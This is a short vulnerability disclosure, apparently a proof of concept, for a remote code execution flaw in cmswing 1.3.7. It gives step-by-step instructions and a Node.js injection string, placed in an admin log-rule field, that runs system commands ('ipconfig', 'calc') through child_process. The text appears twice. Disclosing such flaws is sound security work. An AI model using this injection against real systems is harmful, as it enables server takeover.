## Find a RCE vulnerability in cmswing project version 1.3.7,Details can be found in the analysis below. ## Local Test ### 1.Enter the background of the system, select update_channel module,then edit it.  ### 2.Change log rule `[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]` or `[user|console.log(require('child_process').execSync('calc').toString('utf-8'))]`  ### 3.Enter [System settings] - [Navigation settings], change a navigation .  ### 4.Change anything, then save it. We can find that our code is executed  ### 5. Get IP and open calc.  
Find a RCE vulnerability in cmswing project version 1.3.7,Details can be found in the analysis below.
Local Test
1.Enter the background of the system, select update_channel module,then edit it.
2.Change log rule
[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]or[user|console.log(require('child_process').execSync('calc').toString('utf-8'))]3.Enter [System settings] - [Navigation settings], change a navigation .
4.Change anything, then save it. We can find that our code is executed
5. Get IP and open calc.